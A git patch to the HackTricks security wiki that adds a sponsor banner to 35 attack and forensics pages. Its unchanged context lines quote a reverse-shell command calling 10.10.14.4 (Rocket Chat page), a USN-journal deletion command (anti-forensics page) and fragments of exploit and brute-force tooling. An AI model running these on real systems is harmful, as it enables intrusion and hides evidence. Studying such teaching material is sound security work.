From 4b64ce2de1db2f34212d23e9487d41f84b2f1e16 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Mon, 8 Apr 2024 00:37:55 +0200 Subject: [PATCH] w --- .../rop-leaking-libc-template.md | 9 +++++++++ .../anti-forensic-techniques.md | 8 ++++++++ .../windows-forensics/README.md | 8 ++++++++ .../image-acquisition-and-mount.md | 8 ++++++++ .../pentesting-network/glbp-and-hsrp-attacks.md | 7 +++++++ .../pentesting-network/nmap-summary-esp.md | 8 ++++++++ .../phishing-methodology/clone-a-website.md | 8 ++++++++ .../sensitive-mounts.md | 8 ++++++++ .../macos-security-protections/macos-gatekeeper.md | 12 ++++++++++-- .../android-app-pentesting/content-protocol.md | 6 ++++++ .../install-burp-certificate.md | 9 +++++++++ .../android-app-pentesting/tapjacking.md | 9 +++++++++ mobile-pentesting/ios-pentesting/ios-uipasteboard.md | 10 ++++++++++ .../11211-memcache/memcache-commands.md | 10 ++++++++++ .../4786-cisco-smart-install.md | 10 ++++++++++ network-services-pentesting/69-udp-tftp.md | 9 +++++++++ network-services-pentesting/pentesting-rlogin.md | 10 ++++++++++ network-services-pentesting/pentesting-rpcbind.md | 11 +++++++++++ network-services-pentesting/pentesting-sap.md | 7 +++++++ network-services-pentesting/pentesting-web/drupal.md | 10 ++++++++++ .../pentesting-web/rocket-chat.md | 10 ++++++++++ .../pentesting-web/vmware-esx-vcenter....md | 10 ++++++++-- pentesting-web/cors-bypass.md | 9 +++++++++ pentesting-web/dependency-confusion.md | 9 +++++++++ pentesting-web/oauth-to-account-takeover.md | 10 ++++++++++ pentesting-web/parameter-pollution.md | 10 ++++++++++ pentesting-web/proxy-waf-protections-bypass.md | 9 +++++++++ todo/more-tools.md | 9 +++++++++ todo/radio-hacking/flipper-zero/fz-125khz-rfid.md | 10 ++++++++++ .../active-directory-methodology/abusing-ad-mssql.md | 10 ++++++++++ .../ad-certificates/domain-escalation.md | 8 ++++++++ .../kerberos-double-hop-problem.md | 9 +++++++++ .../active-directory-methodology/laps.md | 9 +++++++++ .../over-pass-the-hash-pass-the-key.md | 9 +++++++++ .../basic-powershell-for-pentesters/powerview.md | 10 ++++++++++ 35 files changed, 314 insertions(+), 4 deletions(-) diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md index e82c5a751..f227ade10 100644 --- a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -14,6 +14,10 @@ Other ways to support HackTricks: +
+ +{% embed url="https://websec.nl/" %} + {% code title="template.py" %} ```python from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools @@ -232,6 +236,11 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**: BINSH = next(libc.search("/bin/sh")) - 64 ``` +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 91f89eb8e..1db2b7f7c 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + # Timestamps @@ -163,6 +167,10 @@ It's also possible to modify the configuration of which files are going to be co * `fsutil usn deletejournal /d c:` +
+ +{% embed url="https://websec.nl/" %} +
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 2b8d2400b..113e63371 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -16,6 +16,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + ## Generic Windows Artifacts ### Windows 10 Notifications @@ -510,6 +514,10 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown. Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. +
+ +{% embed url="https://websec.nl/" %} +
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index ebacbbf4d..fabb1028f 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -12,6 +12,10 @@
+
+ +{% embed url="https://websec.nl/" %} + ## Acquisition ### DD @@ -120,6 +124,10 @@ Note that sector size is **512** and start is **2048**. Then mount the image lik mount disk.img /mnt -o ro,offset=$((2048*512)) ``` +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index a9f7f8255..c529886c1 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + ## FHRP Hijacking Overview @@ -136,6 +140,9 @@ Executing these steps places the attacker in a position to intercept and manipul ## References - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) +
+ +{% embed url="https://websec.nl/" %}
diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 91ce4bd5b..19b61817e 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ``` @@ -267,6 +271,10 @@ Moreover, probes which do not have a specifically defined **`servicewaitms`** us If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored. +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md index bd4b6e8c3..18a3aa6da 100644 --- a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md +++ b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + For a phishing assessment sometimes it might be useful to completely **clone a website**. @@ -40,6 +45,9 @@ goclone #https://github.com/trustedsec/social-engineer-toolkit ``` +
+ +{% embed url="https://websec.nl/" %}
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index 4011e03ab..fe0026822 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected. **You can find further details of each potential vuln in** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.** @@ -183,6 +187,10 @@ This directory permits access to modify kernel variables, usually via `sysctl(2) * [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf) * [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md index 55e0a0b02..a8a7a53ab 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md @@ -9,11 +9,14 @@ * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) -* -* .
+
+ +{% embed url="https://websec.nl/" %} + + ## Gatekeeper **Gatekeeper** is a security feature developed for Mac operating systems, designed to ensure that users **run only trusted software** on their systems. It functions by **validating software** that a user downloads and attempts to open from **sources outside the App Store**, such as an app, a plug-in, or an installer package. @@ -461,6 +464,11 @@ aa archive -d s/ -o app.aar In an ".app" bundle if the quarantine xattr is not added to it, when executing it **Gatekeeper won't be triggered**. +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/android-app-pentesting/content-protocol.md b/mobile-pentesting/android-app-pentesting/content-protocol.md index 87becb275..ea2849016 100644 --- a/mobile-pentesting/android-app-pentesting/content-protocol.md +++ b/mobile-pentesting/android-app-pentesting/content-protocol.md @@ -14,6 +14,9 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} **This is a summary of the post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)** @@ -94,6 +97,9 @@ Proof-of-Concept HTML: ``` +
+ +{% embed url="https://websec.nl/" %}
diff --git a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md index 161547420..bd3d89bc9 100644 --- a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md +++ b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## On a Virtual Machine First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ @@ -165,6 +170,10 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/ * [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/android-app-pentesting/tapjacking.md b/mobile-pentesting/android-app-pentesting/tapjacking.md index 46883bf72..e37b8bfd2 100644 --- a/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## **Basic Information** **Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app.\ @@ -74,6 +79,10 @@ The mitigation is relatively simple as the developer may choose not to receive t > > To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window. +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index bc2afeb33..79c73686f 100644 --- a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + Data sharing within and across applications on iOS devices is facilitated by the [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) mechanism, which is divided into two primary categories: - **Systemwide general pasteboard**: This is used for sharing data with **any application** and is designed to persist data across device restarts and app uninstallations, a feature that has been available since iOS 10. @@ -79,6 +84,11 @@ setInterval(function () { * [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/) +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/11211-memcache/memcache-commands.md b/network-services-pentesting/11211-memcache/memcache-commands.md index 95d6e8900..2dee67897 100644 --- a/network-services-pentesting/11211-memcache/memcache-commands.md +++ b/network-services-pentesting/11211-memcache/memcache-commands.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## Commands Cheat-Sheet **From** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached) @@ -140,6 +145,11 @@ END This at least helps to see if any keys are used. To dump the key names from a PHP script that already does the memcache access you can use the PHP code from [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html). + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md index 85f3c01fa..9187ea18c 100644 --- a/network-services-pentesting/4786-cisco-smart-install.md +++ b/network-services-pentesting/4786-cisco-smart-install.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information **Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.** @@ -49,6 +54,11 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder
+ +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/69-udp-tftp.md b/network-services-pentesting/69-udp-tftp.md index b967d7a37..a5997d035 100644 --- a/network-services-pentesting/69-udp-tftp.md +++ b/network-services-pentesting/69-udp-tftp.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + # Basic Information @@ -56,6 +60,11 @@ client.upload("filename to upload", "/local/path/file", timeout=5) * `port:69` +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-rlogin.md b/network-services-pentesting/pentesting-rlogin.md index 57b7ad207..3e0932225 100644 --- a/network-services-pentesting/pentesting-rlogin.md +++ b/network-services-pentesting/pentesting-rlogin.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information In the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections. @@ -46,6 +51,11 @@ rlogin -l find / -name .rhosts ``` +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md index 574b14a2e..8a00929aa 100644 --- a/network-services-pentesting/pentesting-rpcbind.md +++ b/network-services-pentesting/pentesting-rpcbind.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information **Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively. @@ -96,6 +101,11 @@ When conducting a **nmap scan** and discovering open NFS ports with port 111 bei * Practice these techniques in the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked). +
+ +{% embed url="https://websec.nl/" %} + + ## HackTricks Automatic Commands ``` @@ -122,6 +132,7 @@ Entry_3: Command: nmap -sSUC -p 111 {IP} ``` +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-sap.md b/network-services-pentesting/pentesting-sap.md index 100a1a081..850a02e3c 100644 --- a/network-services-pentesting/pentesting-sap.md +++ b/network-services-pentesting/pentesting-sap.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + # Introduction about SAP @@ -318,6 +322,9 @@ bizploit> start * [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/) * [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) +
+ +{% embed url="https://websec.nl/" %}
diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal.md index ef1fc208f..2a023b93c 100644 --- a/network-services-pentesting/pentesting-web/drupal.md +++ b/network-services-pentesting/pentesting-web/drupal.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## Discovery * Check **meta** @@ -189,6 +194,11 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from * [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209) +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 09307e0d1..1687249ce 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## RCE If you are admin inside Rocket Chat you can get RCE. @@ -46,6 +51,11 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") * Call it with curl and you shuold receive the rev shell + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md index f281a3098..152f2d797 100644 --- a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md +++ b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md @@ -14,10 +14,13 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} # Enumeration -```text +```bash nmap -sV --script "http-vmware-path-vuln or vmware-version" -p msf> use auxiliary/scanner/vmware/esx_fingerprint msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump @@ -25,12 +28,15 @@ msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump # Bruteforce -```text +```bash msf> auxiliary/scanner/vmware/vmware_http_login ``` If you find valid credentials, you can use more metasploit scanner modules to obtain information. +
+ +{% embed url="https://websec.nl/" %}
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md index 9658bf3cf..90920b5ab 100644 --- a/pentesting-web/cors-bypass.md +++ b/pentesting-web/cors-bypass.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + ## What is CORS? Cross-Origin Resource Sharing (CORS) standard **enables servers to define who can access their assets** and **which HTTP request methods are permitted** from external sources. @@ -398,6 +402,11 @@ You can find more information about the previous bypass techniques and how to us * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration) * [https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b](https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b) + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md index 47642f347..06dc9e4d8 100644 --- a/pentesting-web/dependency-confusion.md +++ b/pentesting-web/dependency-confusion.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information In summary, a dependency confusion vulnerability occurs when a project is using a library with a **misspelled** name, **inexistent** or with an **unspecified version** and the used dependency repository allows to **gather updated versions from public** repositories. @@ -51,6 +56,10 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b * [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) * [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md index 8faac7bfc..bd35b55a5 100644 --- a/pentesting-web/oauth-to-account-takeover.md +++ b/pentesting-web/oauth-to-account-takeover.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server). @@ -220,6 +225,11 @@ If the platform you are testing is an OAuth provider [**read this to test for po * [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1) * [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors) + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md index d4c211e84..59e546848 100644 --- a/pentesting-web/parameter-pollution.md +++ b/pentesting-web/parameter-pollution.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + # HTTP Parameter Pollution (HPP) Overview HTTP Parameter Pollution (HPP) is a technique where attackers manipulate HTTP parameters to change the behavior of a web application in unintended ways. This manipulation is done by adding, modifying, or duplicating HTTP parameters. The effect of these manipulations is not directly visible to the user but can significantly alter the application's functionality on the server side, with observable impacts on the client side. @@ -65,6 +70,11 @@ The way web technologies handle duplicate HTTP parameters varies, affecting thei * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654) * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution) +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-web/proxy-waf-protections-bypass.md b/pentesting-web/proxy-waf-protections-bypass.md index 7b667cfbb..259fd6f8e 100644 --- a/pentesting-web/proxy-waf-protections-bypass.md +++ b/pentesting-web/proxy-waf-protections-bypass.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + ## Bypass Nginx ACL Rules with Pathname Manipulation Techniques [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies). @@ -122,6 +126,11 @@ It was possible to bypass AWS WAF because it wouldn't understand that the next l * [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) * [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/todo/more-tools.md b/todo/more-tools.md index c9b497266..c9251cbee 100644 --- a/todo/more-tools.md +++ b/todo/more-tools.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + # BlueTeam @@ -131,6 +135,11 @@ Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a pla * [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md index 8e58cab03..ea6164b4f 100644 --- a/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md +++ b/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md @@ -14,6 +14,11 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + + ## Intro For more info about how 125kHz tags work check: @@ -63,6 +68,11 @@ After **copying** a card or **entering** the ID **manually** it's possible to ** * [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/) +
+ +{% embed url="https://websec.nl/" %} + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md index 3ac93e905..d0f8271a1 100644 --- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md +++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## **MSSQL Enumeration / Discovery** The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case. @@ -205,6 +210,11 @@ A strategy that many authors have come up with is to force a SYSTEM service to a [SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command. + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 13cf4211e..d2e6d1775 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md @@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + **This is a summary of escalation technique sections of the posts:** * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf) @@ -620,6 +624,10 @@ Upon authentication across a trust, the **Authenticated Users SID** is added to Both scenarios lead to an **increase in the attack surface** from one forest to another. The settings of the certificate template could be exploited by an attacker to obtain additional privileges in a foreign domain. +
+ +{% embed url="https://websec.nl/" %} +
